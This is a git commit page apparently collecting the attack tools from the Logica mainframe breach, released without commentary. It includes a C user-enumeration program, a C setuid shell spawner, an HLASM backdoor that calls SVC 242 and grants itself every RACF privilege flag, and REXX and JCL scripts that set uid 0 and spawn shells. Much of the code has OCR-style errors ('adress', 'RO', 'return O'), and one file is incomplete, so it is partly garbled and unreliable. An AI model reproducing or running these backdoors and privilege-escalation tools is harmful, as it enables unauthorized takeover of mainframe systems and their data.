Initial commit of all files

An extract of all the scripts, source code from the Logica breach. README to follow.
mainframed · May 5, 2013 · 9ba4f8e · 9ba4f8e
commit 9ba4f8e
Show file tree

Hide file tree

Showing 10 changed files with 993 additions and 0 deletions.
diff --git a/Enum.c b/Enum.c
@@ -0,0 +1,25 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <string.h>
+#include <pwd.h>
+
+int main(int argc, char *argv[])
+{
+unsigned int a,b;
+if (argc <2) exit(1);
+a = atoi(argv[1]); 
+b=(argc>2)?atoi(argv[2]) : (~0); 
+printf("%u...%u\n", a,b); 
+while (a <= b)
+{
+struct passwd *pw = getpwuid((uid_t)a);
+
+if (pw!=NULL)
+{
+printf("%u %u:%u %s %s %s\n", a, (unsigned int)pw->pw_uid, (unsigned int)pw->pw_gid, pw->pw_name, pw->pw_dir, pw->pw_shell);
+}
+a++;
+}
+return 0;
+}
diff --git a/Ha.c b/Ha.c
@@ -0,0 +1,8 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <string.h>
+int main(int argc, char *argv[]) { if (argc<3)exit(1 ); 
+setgid(atoi(argv[2])); setuid(atoi(argv[1])); setgid(atoi(argv[2])); 
+execl("/bin/sh","sh",NULL); return O;
+}
diff --git a/Tfy.source.backdoor b/Tfy.source.backdoor
@@ -0,0 +1,76 @@
+* From bilaga_a.pdf
+RO EQU O
+Rl EQU l
+R2 EQU 2
+R3 EQU 3
+R4 EQU 4
+R5 EQU 5
+R6 EQU 6
+R7 EQU 7
+R8 EQU 8
+R9 EQU 9
+RlO EQU 10
+R11 EQU 11
+R12 EQU 12
+R13 EQU 13
+R14 EQU 14
+R15 EQU 15
+*
+ASCBPVT  EQU X'224' 
+ASCBASXB EQU X'6C' 
+ASXBACEE EQU X'C8'
+*  MACRO IMPORTS
+          IHAACEE
+*
+TFY	 CSECT
+	 SAVE  (R14,R12),,TRAGEDY,TYRANNY
+	 LR    R12,R15
+	 USING TFY,R12
+	 LA    R6,SAVEAREA
+	 ST    R6,8(R13)
+	 ST    R13,SAVEAREA+4
+	 LR    R13,R6
+	 WTO   'SERVICE 242 :: ART AND STRATEGY'
+ 	 LA    R0,1
+	 SVC   242
+	 WTO   'MASTER, IM SO GLAD TO FEEL YOUR PRESENCE. . . '
+	MODESET KEY=ZERO, MODE=SUP
+	 WTO ' BUT YOU DONT SEEM TO SHARE MY AMBITIONS ' 
+	 L     R5,ASCBPVT
+	 L     R5,ASCBASXB (R5)
+	 L     R5,ASXBACEE (R5)
+	 USING ACEE,R5
+	 WTO   'I RELY UPON YOU TO BREAK THE SILENACEE '
+	 MVC   IDWOUSRI,ACEEUSRI
+	 MVC   IDWOGRPN,ACEEGRPN
+	 WTO   MF=(E,IDWOBLK)
+	 OI    ACEEFLG1,ACEESPEC+ACEEOPER+ACEEAUDT+ACEERACF 
+	 OI    ACEEFLG2,ACEEALTR+ACEECNTL+ACEEUPDT+ACEEREAD 
+	 OI    ACEEFLG3,ACEEACLT+ACEENPWR
+	 OI    ACEEFLG4,ACEEUATH+ACEEDASD+ACEETAPE+ACEETERM 
+	 MVC   ACEEPROC,LIBRPROC
+	 LA    R0,8
+	 STC   R0,ACEEUSRL
+	 LA    R0,4
+	 STC   RO,ACEEGRPL
+	 MVC   ACEEUSRI,LIBRUSRI
+	 MVC   ACEEGRPN,LIBRGRPN
+	 L     R13,SAVEAREA+4
+	 LR    R15,R2
+	RETURN (R14,R12,RC=(R15)
+SAVEAREA DS    18F
+*
+LIBRPROC DC    C'BPXPINPR' 
+LIBRUSRI DC    C'BPXOINIT'
+LIBRGRPN DC    C'SYS1'
+*
+IDWOBLK  EQU   *
+IDWO_LEN DC    AL2(IDWO_END-IDWO_LEN) 
+ 	 DC    H'0' 
+IDWOMSG  DC    C'JA,DU BIST KOMRADE '
+IDWOUSRI DS    CL8
+	 DC    C' IM CELL '
+IDWOGRPN DS    CL8
+	 DC    C' AUF DIE ROTE ARME COMMUNIST FRACTION!'
+IDWO_END EQU   *
+	 END   TFY
diff --git a/aptitup.jcl b/aptitup.jcl
@@ -0,0 +1,12 @@
+//AVIY356A JOB AVIY356A
+//* APTITUP.JCL
+//* From BILAGA_A.pdf
+//AIUSTEP EXEC PGM=BPXBATCH,
+//	PARM='SH /tmp/a.env'
+//STDERR DD PATH='/tmp/a.err',
+//	PATHOPTS= (OWRONLY, OCREAT, OTRUNC) , 
+//	PATHMODE= (SIRWXU)
+//STDOUT DD PATH='/tmp/a.out',
+//	PATHOPTS= ( OWRONLY , OCREAT , OTRUNC ) , 
+//	PATHMODE= (SIRWXU)
+//STDIN DD DUMMY
diff --git a/go.rx b/go.rx
@@ -0,0 +1,18 @@
+/* REXX */
+ca11 syscalls 'ON'
+adress syscall 'geteuid'
+coreuid=retval
+adress syscall 'getegid'
+curegid=retval
+say 'euid:' coreuid 'egid:' curegid
+address syscall 'setuid ' cureuid
+address syscall 'setgid ' curegid
+adress syscall 'getuid'
+say 'euid:' retval
+address syscall 'getgid'
+say 'gid:' retval
+env.0=1
+env.1='PATH=/bin:/sbin/usr/sbin:/usr/bin'
+call bpxwunix '/bin/sh',,,,env.
+
+
diff --git a/kuku.rx b/kuku.rx
@@ -0,0 +1,18 @@
+/* REXX */
+/* from fup.pdf 
+   this file was in complete these are the only snipped that exist */
+call syscall 'ON'
+if __argv.2=='kuku' then do
+	address syscall 'setuid 0'
+
+
+say 'l3tz g3t s0m3 0f d4t r00t!@#'
+
+parm.0=2
+parm.1=__argv.1
+parm.2='kuku'
+env.0=1
+env.1='_BPC_SHAREAS=NO'
+
+address syscall 'spawn /usr/lpp/netview/v5r1/bin/cnmeunix 0 . parm. env.'
+address syscall 'wait wret.'
diff --git a/nop.jcl b/nop.jcl
@@ -0,0 +1,11 @@
+//APT2011A JOB (S101), 'APT2011',CLASS=S,
+//	REMOTR=KNARK,DEST=KNARK,DELDEST,KNARK,
+//	MSGCLASS=H,PRTY=15,MSGLEVEL=(1,1)
+//* From fup.pdf
+//STEP EXEC PGM=IEFBR14
+//SYSERROR DD SYSOUT=
+//SYSABENT DD SYSOUT=*
+//SYSTSPRT DD SYSOUT=*
+//SYSTSOUT DD SYSOUT=*
+//SYSTSIN  DD *
+/*